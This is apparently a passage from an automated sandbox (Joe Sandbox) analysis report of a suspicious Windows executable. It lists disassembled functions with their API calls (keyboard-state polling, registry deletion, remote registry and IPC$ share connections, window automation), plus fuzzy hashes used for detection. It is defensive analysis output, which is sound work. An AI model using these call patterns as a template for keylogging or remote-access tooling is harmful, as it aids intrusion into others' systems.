                                                                                                                                                                                                                                                                                        • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                                        • Opcode ID: 8022cf5b5da373af8cb65d6c427eda940c18107c84106753ee407bf9c6f8628b
                                                                                                                                                                                                                                                                                        • Instruction ID: 9efb69d78e8776a830584fd4c3f55816f24ec46caa3f28bc8a1a59f1a290894a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8022cf5b5da373af8cb65d6c427eda940c18107c84106753ee407bf9c6f8628b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E318E72D0112DBBDB20AB90DC88EFFBB7CEF45754F100066F905E2194DA349E45ABA0
                                                                                                                                                                                                                                                                                        Function 00F6EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00F6EFCB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F1F215: timeGetTime.WINMM(?,?,00F6EFEB), ref: 00F1F219
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F6EFF8
                                                                                                                                                                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00F6F01C
                                                                                                                                                                                                                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F6F03E
                                                                                                                                                                                                                                                                                        • SetActiveWindow.USER32 ref: 00F6F05D
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F6F06B
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F6F08A
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00F6F095
                                                                                                                                                                                                                                                                                        • IsWindow.USER32 ref: 00F6F0A1
                                                                                                                                                                                                                                                                                        • EndDialog.USER32(00000000), ref: 00F6F0B2
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                                        • String ID: BUTTON
                                                                                                                                                                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                                        • Opcode ID: ecbd4882229ca5f9fb8197db7b4837a5159197039954d9733c07526488f0c82b
                                                                                                                                                                                                                                                                                        • Instruction ID: e4ee5ca63a9137944a0ccf1847bebb3bf0c4e07fd721cb735f253c78167c8fcd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ecbd4882229ca5f9fb8197db7b4837a5159197039954d9733c07526488f0c82b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9121F37650920DBFE7102F30FC89F267B6AFB49754B110027F60282272CB368C44BB62
                                                                                                                                                                                                                                                                                        Function 00F6F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00F6F374
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00F6F38A
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F6F39B
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F6F3AD
                                                                                                                                                                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6F3BE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                                        • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                                        • Opcode ID: 0ee738b482d05db27e862c152edf4cc2ac20acdd7ba0f47645dbe0d9ae129d12
                                                                                                                                                                                                                                                                                        • Instruction ID: fa2582d97322de4bd12f6f74078b53abb29bf34f145dc6a2514d4e6d82c0e90b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ee738b482d05db27e862c152edf4cc2ac20acdd7ba0f47645dbe0d9ae129d12
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC11A371A5035A79D720B7669C4BFFF7A7CEBD2B50F40042D7801E20D0DAB09908F9A2
                                                                                                                                                                                                                                                                                        Function 00F6A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6A9D9
                                                                                                                                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00F6AA44
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F6AA64
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00F6AA7B
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F6AAAA
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00F6AABB
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F6AAE7
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00F6AAF5
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F6AB1E
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00F6AB2C
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F6AB55
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00F6AB63
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                        • Opcode ID: e617f03ef87a326b2a836337df971db71f193a78866df072d48aee60a77c31e0
                                                                                                                                                                                                                                                                                        • Instruction ID: b9bb123a205dbbcfed511ab9b6f7feaa5be5fab8a50754d06670b01b3270b08a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e617f03ef87a326b2a836337df971db71f193a78866df072d48aee60a77c31e0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B451E860E0478829FB35D7A48950BEABFB59F02350F08459AC5C26B1C2DA549F8CEF63
                                                                                                                                                                                                                                                                                        Function 00F6662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00F66649
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F66662
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00F666C0
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00F666D0
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F666E2
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00F66736
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00F66744
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00F66756
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00F66798
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00F667AB
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F667C1
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F667CE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                                        • Opcode ID: fee26fe0c397286d579d5a1803ee833bcde3a7a7f93996776abd1e8e4bf65c34
                                                                                                                                                                                                                                                                                        • Instruction ID: e3c301531fa569269d5619c939857c791ab21f42aacdf44f43d82366a47c1988
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fee26fe0c397286d579d5a1803ee833bcde3a7a7f93996776abd1e8e4bf65c34
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0510071E00219AFDF18CFA8DD95AAEBBB5FB48315F208129F519E7290DB709D04DB50
                                                                                                                                                                                                                                                                                        Function 00F0146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F01488,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F01865
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?), ref: 00F01521
                                                                                                                                                                                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F015BB
                                                                                                                                                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00F429B4
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F429E2
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F0145A,00000000,?), ref: 00F429F9
                                                                                                                                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F0145A,00000000), ref: 00F42A15
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00F42A27
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 641708696-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8e43c5b20aecae6ababa87070343216cf4be63deca1965172777b26c22bc8db8
                                                                                                                                                                                                                                                                                        • Instruction ID: 501a7a193d61f52b1289dd11f40fe3cdb88fa1c45e562fe93dba6e3da4df9469
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e43c5b20aecae6ababa87070343216cf4be63deca1965172777b26c22bc8db8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F618D31901709DFDB759F24DD58B39BBB2FB90322F54412AE8424B6B0C774A891FB86
                                                                                                                                                                                                                                                                                        Function 00F02128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F02234: GetWindowLongW.USER32(?,000000EB), ref: 00F02242
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00F02152
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6fae9395b36f0719cda51f4d2b03e4d6c1a676256f2a5328a37e1b5d5f678190
                                                                                                                                                                                                                                                                                        • Instruction ID: 4e58076f0279a369cd1a4db01f5dfd76aa0602feb1f70cbd2c2b85900ef4846e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fae9395b36f0719cda51f4d2b03e4d6c1a676256f2a5328a37e1b5d5f678190
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B341C532500644EFEB215F389C48BB93B65AB42330F254256FEA6872E1C7318D42FB20
                                                                                                                                                                                                                                                                                        Function 00F6A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00F50D31,00000001,0000138C,00000001,00000000,00000001,?,00F7EEAE,00FD2430), ref: 00F6A091
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00F50D31,00000001), ref: 00F6A09A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00F50D31,00000001,0000138C,00000001,00000000,00000001,?,00F7EEAE,00FD2430,?), ref: 00F6A0BC
                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000,?,00F50D31,00000001), ref: 00F6A0BF
                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6A1E0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                        • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                                        • Opcode ID: ddb9230afc5c810ffd922c01107015ff01c0a4bff26eb0d8ffe9a7b5a808cc1e
                                                                                                                                                                                                                                                                                        • Instruction ID: 39d596b52fadefebcca0d724de28cabb603bbd65a7489755d7f54626877f05ac
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddb9230afc5c810ffd922c01107015ff01c0a4bff26eb0d8ffe9a7b5a808cc1e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94411F7280020DAACB15FBE0DD46EEEB778AF59740F500065B501B2092EB796F59FF61
                                                                                                                                                                                                                                                                                        Function 00F60FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F08577: _wcslen.LIBCMT ref: 00F0858A
                                                                                                                                                                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00F61093
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00F610AF
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00F610CB
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00F610F5
                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00F6111D
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F61128
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00F6112D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                        • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                        • Opcode ID: 23a63a1b7280df35e1dda45d703a90d478a75ebe8393d2c468ae813345cc8706
                                                                                                                                                                                                                                                                                        • Instruction ID: 2a6e8c96de3bfdb44f1be2f25780e35df9d8678556ad5cd38c9364ca0bafd900
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23a63a1b7280df35e1dda45d703a90d478a75ebe8393d2c468ae813345cc8706
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0410976C1022DABCF21EBA4DC85DEEB778FF08750F044169E901A31A1EB359E45EB50
                                                                                                                                                                                                                                                                                        Function 00F94A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F94AD9
                                                                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00F94AE0
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F94AF3
                                                                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00F94AFB
                                                                                                                                                                                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F94B06
                                                                                                                                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00F94B10
                                                                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00F94B1A
                                                                                                                                                                                                                                                                                        • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00F94B30
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00F94B3C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                        • Opcode ID: baab7fdc79029b56a73ec346b85827ff445c2e0aff614738762ae62889fad0d6
                                                                                                                                                                                                                                                                                        • Instruction ID: a6ca0d1a68c4735a0b34edf1b75a7617ad4c54c8fc53404787832031852cdb92
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: baab7fdc79029b56a73ec346b85827ff445c2e0aff614738762ae62889fad0d6
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48316E32501219BBEF219FA4DC08FDA3BA9FF59364F210211FA15E61A0C735E851FB94
                                                                                                                                                                                                                                                                                        Function 00F8468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F846B9
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F846E7
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F846F1
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F8478A
